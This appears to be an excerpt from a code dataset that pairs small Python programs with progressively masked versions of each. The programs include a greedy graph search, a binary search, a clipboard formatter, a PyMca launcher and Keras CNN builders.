"step-5": "import numpy as np\nfrom StudyCaseUdemy.Graph import Graph\n\nclass OrderVector:\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos+1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos+1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i].distance)\n\n\nclass Greedy:\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\n\ngrafo = Graph()\n# vector = OrderVector(5)\n# vector.insert(grafo.arad)\n# vector.insert(grafo.craiova)\n# vector.insert(grafo.bucharest)\n# vector.insert(grafo.dobreta)\n# vector.insert(grafo.lugoj)\n\n\n# vector.printer()\ngreedy = Greedy(grafo.bucharest)\ngreedy.search(grafo.arad)\n",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |
__author__ = 'jamjiang'
class Person:
def __init__(self, name):
self.name = name
def sayHi(self):
print 'hi!, I am', self.name
david = Person('David')
david.sayHi()
Person('leo').sayHi()
|
normal
|
{
"blob_id": "fcc12b26308e3031de7e8fcf4ad43ec92279d400",
"index": 5922,
"step-1": "__author__ = 'jamjiang'\nclass Person:\n def __init__(self, name):\n self.name = name\n def sayHi(self):\n print 'hi!, I am', self.name\n\ndavid = Person('David')\ndavid.sayHi()\n\nPerson('leo').sayHi()\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# python2.7
#formats for oracle lists
import pyperclip
text = str(pyperclip.paste()).strip()
lines = text.split('\n')
for i in range(len(lines)):
if (i+1) < len(lines):
lines[i] = str('\'')+str(lines[i]).replace("\r","").replace("\n","") + str('\',')
elif (i+1) == len(lines):
lines[i] = str('\'')+str(lines[i]).replace("\r","").replace("\n","")+ '\''
text = '(' + '\n'.join(lines) + ')'
pyperclip.copy(text)
|
normal
|
{
"blob_id": "454fd88af552d7a46cb39167f21d641420973959",
"index": 2312,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(len(lines)):\n if i + 1 < len(lines):\n lines[i] = str(\"'\") + str(lines[i]).replace('\\r', '').replace('\\n', ''\n ) + str(\"',\")\n elif i + 1 == len(lines):\n lines[i] = str(\"'\") + str(lines[i]).replace('\\r', '').replace('\\n', ''\n ) + \"'\"\n<mask token>\npyperclip.copy(text)\n",
"step-3": "<mask token>\ntext = str(pyperclip.paste()).strip()\nlines = text.split('\\n')\nfor i in range(len(lines)):\n if i + 1 < len(lines):\n lines[i] = str(\"'\") + str(lines[i]).replace('\\r', '').replace('\\n', ''\n ) + str(\"',\")\n elif i + 1 == len(lines):\n lines[i] = str(\"'\") + str(lines[i]).replace('\\r', '').replace('\\n', ''\n ) + \"'\"\ntext = '(' + '\\n'.join(lines) + ')'\npyperclip.copy(text)\n",
"step-4": "import pyperclip\ntext = str(pyperclip.paste()).strip()\nlines = text.split('\\n')\nfor i in range(len(lines)):\n if i + 1 < len(lines):\n lines[i] = str(\"'\") + str(lines[i]).replace('\\r', '').replace('\\n', ''\n ) + str(\"',\")\n elif i + 1 == len(lines):\n lines[i] = str(\"'\") + str(lines[i]).replace('\\r', '').replace('\\n', ''\n ) + \"'\"\ntext = '(' + '\\n'.join(lines) + ')'\npyperclip.copy(text)\n",
"step-5": "# python2.7\r\n#formats for oracle lists\r\n\r\nimport pyperclip\r\ntext = str(pyperclip.paste()).strip()\r\n\r\nlines = text.split('\\n')\r\nfor i in range(len(lines)):\r\n if (i+1) < len(lines):\r\n lines[i] = str('\\'')+str(lines[i]).replace(\"\\r\",\"\").replace(\"\\n\",\"\") + str('\\',')\r\n elif (i+1) == len(lines):\r\n lines[i] = str('\\'')+str(lines[i]).replace(\"\\r\",\"\").replace(\"\\n\",\"\")+ '\\''\r\ntext = '(' + '\\n'.join(lines) + ')'\r\n\r\npyperclip.copy(text)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
'''code for recursive binary search '''
def rbinarysearch(l, k, begin, end):
if(begin == end):
if(l[begin] == k):
return 1
else:
return 0
if(end-begin == 1):
if(l[end] == k) or (l[begin] == k):
return 1
else:
return 0
if(end-begin > 1):
mid = (end+begin)//2
if(l[mid] > k):
end = mid-1
if(l[mid] < k):
begin = mid+1
if(l[mid] == k):
return 1
if(end-begin < 0):
return 0
return rbinarysearch(l, k, begin, end)
print(rbinarysearch([1,2,3,4,5], -1, 0,4))
|
normal
|
{
"blob_id": "7171edc3eecd2f0cdebd914e89a7a7e0353ddf63",
"index": 9209,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef rbinarysearch(l, k, begin, end):\n if begin == end:\n if l[begin] == k:\n return 1\n else:\n return 0\n if end - begin == 1:\n if l[end] == k or l[begin] == k:\n return 1\n else:\n return 0\n if end - begin > 1:\n mid = (end + begin) // 2\n if l[mid] > k:\n end = mid - 1\n if l[mid] < k:\n begin = mid + 1\n if l[mid] == k:\n return 1\n if end - begin < 0:\n return 0\n return rbinarysearch(l, k, begin, end)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef rbinarysearch(l, k, begin, end):\n if begin == end:\n if l[begin] == k:\n return 1\n else:\n return 0\n if end - begin == 1:\n if l[end] == k or l[begin] == k:\n return 1\n else:\n return 0\n if end - begin > 1:\n mid = (end + begin) // 2\n if l[mid] > k:\n end = mid - 1\n if l[mid] < k:\n begin = mid + 1\n if l[mid] == k:\n return 1\n if end - begin < 0:\n return 0\n return rbinarysearch(l, k, begin, end)\n\n\nprint(rbinarysearch([1, 2, 3, 4, 5], -1, 0, 4))\n",
"step-4": "'''code for recursuve binary search '''\n\n\ndef rbinarysearch(l, k, begin, end):\n\n if(begin == end):\n if(l[begin] == k):\n return 1\n else:\n return 0\n if(end-begin == 1):\n if(l[end] == k) or (l[begin] == k):\n return 1\n else:\n return 0\n\n if(end-begin > 1):\n mid = (end+begin)//2\n if(l[mid] > k):\n end = mid-1\n if(l[mid] < k):\n begin = mid+1\n if(l[mid] == k):\n return 1\n if(end-begin < 0):\n return 0\n\n return rbinarysearch(l, k, begin, end)\n\n\nprint(rbinarysearch([1,2,3,4,5], -1, 0,4))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/python
from PyMca5.PyMcaGui import PyMcaQt as qt
from RixsTool import mainWindow
app = qt.QApplication([])
win = mainWindow.RIXSMainWindow()
win.show()
app.exec_()
|
normal
|
{
"blob_id": "34c8541e640596f51a5232cba06172df5814db14",
"index": 7734,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwin.show()\napp.exec_()\n",
"step-3": "<mask token>\napp = qt.QApplication([])\nwin = mainWindow.RIXSMainWindow()\nwin.show()\napp.exec_()\n",
"step-4": "from PyMca5.PyMcaGui import PyMcaQt as qt\nfrom RixsTool import mainWindow\napp = qt.QApplication([])\nwin = mainWindow.RIXSMainWindow()\nwin.show()\napp.exec_()\n",
"step-5": "#!/usr/bin/python\n\nfrom PyMca5.PyMcaGui import PyMcaQt as qt\nfrom RixsTool import mainWindow\napp = qt.QApplication([])\nwin = mainWindow.RIXSMainWindow()\nwin.show()\napp.exec_()\n ",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class TotalReshape(Layer):
def __init__(self, target_shape, **kwargs):
self.target_shape = target_shape
super(TotalReshape, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return tuple(x if x != -1 else None for x in self.target_shape)
def call(self, x):
return K.reshape(x, self.target_shape)
class BaseReducer(Layer):
def __init__(self, **kwargs):
super(BaseReducer, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return input_shape[:-1]
class Average(BaseReducer):
def call(self, x):
return K.mean(x, axis=-1)
class Max(BaseReducer):
def call(self, x):
return K.max(x, axis=-1)
class TopKAverage(BaseReducer):
def __init__(self, k, **kwargs):
self.k = k
super(TopKAverage, self).__init__(**kwargs)
def call(self, x):
if K.backend() == 'tensorflow':
tf = K.tf
x, _ = tf.nn.top_k(x, self.k, sorted=False)
return K.mean(x, axis=-1)
else:
raise NotImplementedError(
'TopKAverage is not implemented for %s backend' % (K.
backend(),))
<|reserved_special_token_0|>
def create_simple_cnn_ln(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization()])
<|reserved_special_token_0|>
def cnn_factory(name):
cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':
create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':
create_dilated_cnn_receptive_field_25,
'dilated_cnn_receptive_field_25_with_tanh':
create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':
create_hartmann_cnn}
return cnn_factories[name]
<|reserved_special_token_0|>
def build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',
lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',
merge_layer='dot-product', weight_decay=None, weight_file=None):
assert len(input_shape) == 5
input_shape = list(input_shape)
for i in range(len(input_shape)):
if input_shape[i] != None:
input_shape[i] = int(input_shape[i])
input_shape = tuple(input_shape)
D, N, W, H, C = input_shape
x1_in = Input(shape=input_shape)
x2_in = Input(shape=input_shape)
x1 = TotalReshape((-1, W, H, C))(x1_in)
x2 = TotalReshape((-1, W, H, C))(x2_in)
cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)
x1 = Flatten()(cnn(x1))
x2 = Flatten()(cnn(x2))
x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])
x = TotalReshape((-1, D, N))(x)
x = reducer_factory(reducer)(x)
y = Activation('softmax')(x)
model = Model(inputs=[x1_in, x2_in], outputs=y)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[
'accuracy', mae, mde])
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TotalReshape(Layer):
def __init__(self, target_shape, **kwargs):
self.target_shape = target_shape
super(TotalReshape, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return tuple(x if x != -1 else None for x in self.target_shape)
def call(self, x):
return K.reshape(x, self.target_shape)
class BaseReducer(Layer):
def __init__(self, **kwargs):
super(BaseReducer, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return input_shape[:-1]
class Average(BaseReducer):
def call(self, x):
return K.mean(x, axis=-1)
class Max(BaseReducer):
def call(self, x):
return K.max(x, axis=-1)
class TopKAverage(BaseReducer):
def __init__(self, k, **kwargs):
self.k = k
super(TopKAverage, self).__init__(**kwargs)
def call(self, x):
if K.backend() == 'tensorflow':
tf = K.tf
x, _ = tf.nn.top_k(x, self.k, sorted=False)
return K.mean(x, axis=-1)
else:
raise NotImplementedError(
'TopKAverage is not implemented for %s backend' % (K.
backend(),))
<|reserved_special_token_0|>
def mae(y_true, y_pred):
""" Implementation of Mean average error
"""
return K.mean(K.abs(y_true - y_pred))
<|reserved_special_token_0|>
def create_simple_cnn(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization()])
def create_simple_cnn_ln(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization()])
def create_dilated_cnn_receptive_field_25(input_shape, kernel_regularizer=None
):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate
=2), BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization()])
<|reserved_special_token_0|>
def cnn_factory(name):
cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':
create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':
create_dilated_cnn_receptive_field_25,
'dilated_cnn_receptive_field_25_with_tanh':
create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':
create_hartmann_cnn}
return cnn_factories[name]
<|reserved_special_token_0|>
def build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',
lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',
merge_layer='dot-product', weight_decay=None, weight_file=None):
assert len(input_shape) == 5
input_shape = list(input_shape)
for i in range(len(input_shape)):
if input_shape[i] != None:
input_shape[i] = int(input_shape[i])
input_shape = tuple(input_shape)
D, N, W, H, C = input_shape
x1_in = Input(shape=input_shape)
x2_in = Input(shape=input_shape)
x1 = TotalReshape((-1, W, H, C))(x1_in)
x2 = TotalReshape((-1, W, H, C))(x2_in)
cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)
x1 = Flatten()(cnn(x1))
x2 = Flatten()(cnn(x2))
x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])
x = TotalReshape((-1, D, N))(x)
x = reducer_factory(reducer)(x)
y = Activation('softmax')(x)
model = Model(inputs=[x1_in, x2_in], outputs=y)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[
'accuracy', mae, mde])
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TotalReshape(Layer):
def __init__(self, target_shape, **kwargs):
self.target_shape = target_shape
super(TotalReshape, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return tuple(x if x != -1 else None for x in self.target_shape)
def call(self, x):
return K.reshape(x, self.target_shape)
class BaseReducer(Layer):
def __init__(self, **kwargs):
super(BaseReducer, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return input_shape[:-1]
class Average(BaseReducer):
def call(self, x):
return K.mean(x, axis=-1)
class Max(BaseReducer):
def call(self, x):
return K.max(x, axis=-1)
class TopKAverage(BaseReducer):
def __init__(self, k, **kwargs):
self.k = k
super(TopKAverage, self).__init__(**kwargs)
def call(self, x):
if K.backend() == 'tensorflow':
tf = K.tf
x, _ = tf.nn.top_k(x, self.k, sorted=False)
return K.mean(x, axis=-1)
else:
raise NotImplementedError(
'TopKAverage is not implemented for %s backend' % (K.
backend(),))
<|reserved_special_token_0|>
def mae(y_true, y_pred):
""" Implementation of Mean average error
"""
return K.mean(K.abs(y_true - y_pred))
def mde(y_true, y_pred):
return K.mean(K.cast(K.abs(K.argmax(y_true, axis=1) - K.argmax(y_pred,
axis=1)), K.floatx()))
def create_simple_cnn(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization()])
def create_simple_cnn_ln(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization()])
def create_dilated_cnn_receptive_field_25(input_shape, kernel_regularizer=None
):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate
=2), BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization()])
def create_dilated_cnn_receptive_field_25_with_tanh(input_shape,
kernel_regularizer=None):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate
=2), BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization()])
def create_hartmann_cnn(input_shape, kernel_regularizer=None):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape), Activation('tanh'), MaxPooling2D(pool_size=(2, 2)),
Conv2D(filters=64, kernel_size=5), Activation('tanh'), MaxPooling2D
(pool_size=(2, 2))])
def cnn_factory(name):
cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':
create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':
create_dilated_cnn_receptive_field_25,
'dilated_cnn_receptive_field_25_with_tanh':
create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':
create_hartmann_cnn}
return cnn_factories[name]
<|reserved_special_token_0|>
def build_simple_cnn(input_shape, create_cnn, optimizer='Adam', lr=0.001,
momentum=None, clipnorm=0.0, loss='mse', reducer='average', merge_layer
='dot-product', weight_decay=None, weight_file=None):
assert len(input_shape) == 5
D, N, W, H, C = input_shape
model = create_cnn(input_shape=(None, None, C), kernel_regularizer=
weight_decay)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss=loss_factory(loss))
if weight_file:
try:
f = h5py.File(weight_file, 'r')
keys = [os.path.join(model.name, w.name) for l in model.layers for
w in l.weights]
weights = [f[os.path.join('model_weights', k)][:] for k in keys]
model.set_weights(weights)
        except Exception:
model.load_weights(weight_file, by_name=True)
return model
def build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',
lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',
merge_layer='dot-product', weight_decay=None, weight_file=None):
assert len(input_shape) == 5
input_shape = list(input_shape)
for i in range(len(input_shape)):
        if input_shape[i] is not None:
input_shape[i] = int(input_shape[i])
input_shape = tuple(input_shape)
D, N, W, H, C = input_shape
x1_in = Input(shape=input_shape)
x2_in = Input(shape=input_shape)
x1 = TotalReshape((-1, W, H, C))(x1_in)
x2 = TotalReshape((-1, W, H, C))(x2_in)
cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)
x1 = Flatten()(cnn(x1))
x2 = Flatten()(cnn(x2))
x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])
x = TotalReshape((-1, D, N))(x)
x = reducer_factory(reducer)(x)
y = Activation('softmax')(x)
model = Model(inputs=[x1_in, x2_in], outputs=y)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[
'accuracy', mae, mde])
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TotalReshape(Layer):
def __init__(self, target_shape, **kwargs):
self.target_shape = target_shape
super(TotalReshape, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return tuple(x if x != -1 else None for x in self.target_shape)
def call(self, x):
return K.reshape(x, self.target_shape)
class BaseReducer(Layer):
def __init__(self, **kwargs):
super(BaseReducer, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return input_shape[:-1]
class Average(BaseReducer):
def call(self, x):
return K.mean(x, axis=-1)
class Max(BaseReducer):
def call(self, x):
return K.max(x, axis=-1)
class TopKAverage(BaseReducer):
def __init__(self, k, **kwargs):
self.k = k
super(TopKAverage, self).__init__(**kwargs)
def call(self, x):
if K.backend() == 'tensorflow':
tf = K.tf
x, _ = tf.nn.top_k(x, self.k, sorted=False)
return K.mean(x, axis=-1)
else:
raise NotImplementedError(
'TopKAverage is not implemented for %s backend' % (K.
backend(),))
def reducer_factory(reducer, k=3):
if reducer == 'max':
return Max()
elif reducer == 'average':
return Average()
elif reducer == 'topK':
return TopKAverage(k)
def mae(y_true, y_pred):
""" Implementation of Mean average error
"""
return K.mean(K.abs(y_true - y_pred))
def mde(y_true, y_pred):
return K.mean(K.cast(K.abs(K.argmax(y_true, axis=1) - K.argmax(y_pred,
axis=1)), K.floatx()))
def create_simple_cnn(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization()])
def create_simple_cnn_ln(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization()])
def create_dilated_cnn_receptive_field_25(input_shape, kernel_regularizer=None
):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate
=2), BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization()])
def create_dilated_cnn_receptive_field_25_with_tanh(input_shape,
kernel_regularizer=None):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate
=2), BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization()])
def create_hartmann_cnn(input_shape, kernel_regularizer=None):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape), Activation('tanh'), MaxPooling2D(pool_size=(2, 2)),
Conv2D(filters=64, kernel_size=5), Activation('tanh'), MaxPooling2D
(pool_size=(2, 2))])
def cnn_factory(name):
cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':
create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':
create_dilated_cnn_receptive_field_25,
'dilated_cnn_receptive_field_25_with_tanh':
create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':
create_hartmann_cnn}
return cnn_factories[name]
def optimizer_factory(optimizer, lr, momentum=None, clipnorm=0.0, clipvalue=1):
if optimizer == 'Adam':
return Adam(lr=lr, clipnorm=clipnorm, clipvalue=clipvalue)
elif optimizer == 'SGD':
return SGD(lr=lr, momentum=momentum, clipnorm=clipnorm, clipvalue=
clipvalue)
def kernel_regularizer_factory(regularizer_factor):
if regularizer_factor == 0.0:
return None
else:
return regularizers.l2(regularizer_factor)
def build_simple_cnn(input_shape, create_cnn, optimizer='Adam', lr=0.001,
momentum=None, clipnorm=0.0, loss='mse', reducer='average', merge_layer
='dot-product', weight_decay=None, weight_file=None):
assert len(input_shape) == 5
D, N, W, H, C = input_shape
model = create_cnn(input_shape=(None, None, C), kernel_regularizer=
weight_decay)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss=loss_factory(loss))
if weight_file:
try:
f = h5py.File(weight_file, 'r')
keys = [os.path.join(model.name, w.name) for l in model.layers for
w in l.weights]
weights = [f[os.path.join('model_weights', k)][:] for k in keys]
model.set_weights(weights)
        except Exception:
model.load_weights(weight_file, by_name=True)
return model
def build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',
lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',
merge_layer='dot-product', weight_decay=None, weight_file=None):
assert len(input_shape) == 5
input_shape = list(input_shape)
for i in range(len(input_shape)):
        if input_shape[i] is not None:
input_shape[i] = int(input_shape[i])
input_shape = tuple(input_shape)
D, N, W, H, C = input_shape
x1_in = Input(shape=input_shape)
x2_in = Input(shape=input_shape)
x1 = TotalReshape((-1, W, H, C))(x1_in)
x2 = TotalReshape((-1, W, H, C))(x2_in)
cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)
x1 = Flatten()(cnn(x1))
x2 = Flatten()(cnn(x2))
x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])
x = TotalReshape((-1, D, N))(x)
x = reducer_factory(reducer)(x)
y = Activation('softmax')(x)
model = Model(inputs=[x1_in, x2_in], outputs=y)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[
'accuracy', mae, mde])
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
def build_hartmann_network(input_shape, create_cnn=create_hartmann_cnn,
optimizer='SGD', lr=0.001, momentum=None, clipnorm=0.0, loss=None,
reducer=None, merge_layer=None, weight_decay=None, weight_file=None):
assert len(input_shape) == 3
H, W, C = input_shape
cnn = create_hartmann_cnn(input_shape=(None, None, C))
sim = Sequential([Conv2D(filters=2048, kernel_size=5, input_shape=K.
int_shape(cnn.output)[1:]), Activation('relu'), Conv2D(filters=2048,
kernel_size=1), Activation('relu'), Conv2D(filters=2, kernel_size=1
), Activation('softmax')])
x_in = [Input(shape=input_shape) for i in range(5)]
x = [cnn(xi) for xi in x_in]
x = KerasAverage()(x)
y = sim(x)
